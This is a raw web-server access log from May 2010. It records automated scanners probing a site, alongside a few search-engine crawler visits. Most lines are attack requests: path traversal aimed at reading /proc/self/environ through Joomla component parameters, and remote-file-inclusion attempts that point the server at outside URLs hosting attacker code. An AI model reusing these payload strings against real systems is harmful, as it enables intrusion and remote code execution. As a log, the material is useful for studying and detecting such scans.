95.211.18.156 - - [31/May/2010:08:52:10 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.55.43.66 - - [31/May/2010:08:52:28 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
218.146.255.196 - - [31/May/2010:08:53:37 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:08:56:44 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:08:56:44 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:08:56:44 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.55.43.66 - - [31/May/2010:08:57:54 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:08:57:54 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:08:57:55 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
218.146.255.196 - - [31/May/2010:08:58:50 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [31/May/2010:08:58:51 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [31/May/2010:08:58:51 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.6.10.110 - - [31/May/2010:08:59:06 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://freebsd.ucoz.net/id.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.831"
89.6.10.110 - - [31/May/2010:08:59:07 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://freebsd.ucoz.net/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.831"
74.55.43.66 - - [31/May/2010:09:01:56 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:09:01:56 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:09:01:57 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:09:01:58 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
8.12.36.47 - - [31/May/2010:09:02:18 -0500] "GET /logs/access_log.1227916800/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 354 "-""libwww-perl/5.834"
8.12.36.47 - - [31/May/2010:09:02:20 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 328 "-""libwww-perl/5.834"
8.12.36.47 - - [31/May/2010:09:02:22 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 333 "-""libwww-perl/5.834"
222.46.27.50 - - [31/May/2010:09:03:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
83.223.118.6 - - [31/May/2010:09:05:43 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
83.223.118.6 - - [31/May/2010:09:05:43 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.115.191 - - [31/May/2010:09:05:56 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.115.191 - - [31/May/2010:09:05:57 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
211.174.62.150 - - [31/May/2010:09:11:41 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.174.62.150 - - [31/May/2010:09:11:41 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.174.62.150 - - [31/May/2010:09:11:41 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.115.111.248 - - [31/May/2010:09:11:56 -0500] "GET /logs/access_log.1249430400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:11:58 -0500] "GET /logs/access_log.1249516800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:12:00 -0500] "GET /logs/access_log.1249689600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:12:02 -0500] "GET /logs/access_log.1249776000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:12:05 -0500] "GET /logs/access_log.1249948800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:12:07 -0500] "GET /logs/access_log.1250640000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:12:09 -0500] "GET /logs/access_log.1250812800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:12:12 -0500] "GET /logs/access_log.1250985600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:12:15 -0500] "GET /logs/access_log.1251417600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:09:12:17 -0500] "GET /logs/access_log.1251504000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
209.44.120.3 - - [31/May/2010:09:22:43 -0500] "GET /logs/access_log.1271548800//list.php?bbs_id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.44.120.3 - - [31/May/2010:09:22:44 -0500] "GET //list.php?bbs_id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.44.120.3 - - [31/May/2010:09:22:44 -0500] "GET /logs//list.php?bbs_id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.195.112.180 - - [31/May/2010:09:22:45 -0500] "GET /logs/access_log.1162339200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
112.216.153.186 - - [31/May/2010:09:23:11 -0500] "GET /logs/access_log.1272326400//?_zb_path=http://st4n.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
112.216.153.186 - - [31/May/2010:09:23:11 -0500] "GET /logs//?_zb_path=http://st4n.fileave.com/id1.txt? HTTP/1.1" 200 7675 "-""Mozilla/5.0"
112.216.153.186 - - [31/May/2010:09:23:11 -0500] "GET //?_zb_path=http://st4n.fileave.com/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:09:24:16 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:09:24:16 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:09:24:16 -0500] "GET /logs/access_log.1271462400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
112.216.153.186 - - [31/May/2010:09:24:33 -0500] "GET /logs/access_log.1272672000//?_zb_path=http://st4n.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.121.58.89 - - [31/May/2010:09:25:14 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
174.121.58.89 - - [31/May/2010:09:25:14 -0500] "GET //index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.121.58.89 - - [31/May/2010:09:25:14 -0500] "GET /logs//index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
207.46.13.101 - - [31/May/2010:09:25:56 -0500] "GET /logs/access_log.1181952000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.65.134 - - [31/May/2010:09:26:37 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:26:38 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:26:38 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:26:38 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:26:46 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:26:46 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
91.121.201.191 - - [31/May/2010:09:27:27 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:09:27:27 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
67.228.226.12 - - [31/May/2010:09:27:40 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
67.228.226.12 - - [31/May/2010:09:27:40 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
120.50.40.133 - - [31/May/2010:09:28:52 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
120.50.40.133 - - [31/May/2010:09:28:52 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
123.226.235.149 - - [31/May/2010:09:29:16 -0500] "GET /logs/index2.php?x=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
123.226.235.149 - - [31/May/2010:09:29:16 -0500] "GET /index2.php?x=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
207.46.204.194 - - [31/May/2010:09:30:56 -0500] "GET /logs/access_log.1209945600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.7.185.19 - - [31/May/2010:09:32:00 -0500] "GET /logs//list.php?bbs_id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.7.185.19 - - [31/May/2010:09:32:00 -0500] "GET /logs/access_log.1271548800//list.php?bbs_id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.7.185.19 - - [31/May/2010:09:32:00 -0500] "GET //list.php?bbs_id=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.111.50 - - [31/May/2010:09:32:39 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.175.111.50 - - [31/May/2010:09:32:39 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.126.31.10 - - [31/May/2010:09:33:00 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.126.31.10 - - [31/May/2010:09:33:00 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.126.31.10 - - [31/May/2010:09:33:01 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.126.31.10 - - [31/May/2010:09:33:01 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.22.87.208 - - [31/May/2010:09:33:24 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.22.87.208 - - [31/May/2010:09:33:24 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.22.87.208 - - [31/May/2010:09:33:37 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.22.87.208 - - [31/May/2010:09:33:37 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.22.87.208 - - [31/May/2010:09:33:39 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.22.87.208 - - [31/May/2010:09:33:39 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.22.87.208 - - [31/May/2010:09:33:40 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
64.22.87.208 - - [31/May/2010:09:33:40 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
211.19.31.123 - - [31/May/2010:09:34:48 -0500] "GET /index1.php?x=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:09:34:48 -0500] "GET /logs/access_log.1270857600/index1.php?x=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:09:34:48 -0500] "GET /logs/index1.php?x=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:09:35:08 -0500] "GET /index1.php?x=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:09:35:08 -0500] "GET /logs/index1.php?x=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.19.31.123 - - [31/May/2010:09:35:08 -0500] "GET /logs/access_log.1270857600/index1.php?x=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.44.82.61 - - [31/May/2010:09:36:47 -0500] "GET /logs/access_log.1271462400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://gbdata.co.uk/images/gh1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
62.44.82.61 - - [31/May/2010:09:36:47 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://gbdata.co.uk/images/gh1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
62.44.82.61 - - [31/May/2010:09:36:47 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://gbdata.co.uk/images/gh1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
192.220.118.1 - - [31/May/2010:09:38:26 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath%5Bpath%5D=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 324 "-""Mozilla/5.0"
192.220.118.1 - - [31/May/2010:09:38:27 -0500] "GET /logs/access_log.1271116800//modules/newbb_plus/class/forumpollrenderer.php?bbPath%5Bpath%5D=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 346 "-""Mozilla/5.0"
192.220.118.1 - - [31/May/2010:09:38:27 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath%5Bpath%5D=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 319 "-""Mozilla/5.0"
187.45.193.159 - - [31/May/2010:09:38:45 -0500] "GET /logs//index2.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
187.45.193.159 - - [31/May/2010:09:38:46 -0500] "GET //index2.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.55.65.134 - - [31/May/2010:09:39:06 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
67.228.226.12 - - [31/May/2010:09:39:06 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
74.55.65.134 - - [31/May/2010:09:39:06 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.228.226.12 - - [31/May/2010:09:39:06 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
74.55.65.134 - - [31/May/2010:09:39:06 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:39:06 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
91.121.201.191 - - [31/May/2010:09:39:06 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
74.55.65.134 - - [31/May/2010:09:39:06 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:39:06 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
91.121.201.191 - - [31/May/2010:09:39:06 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
120.50.40.133 - - [31/May/2010:09:39:37 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
120.50.40.133 - - [31/May/2010:09:39:37 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:41:46 -0500] "GET /logs/access_log.1274572800///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:41:47 -0500] "GET ///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:09:41:47 -0500] "GET /logs///index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
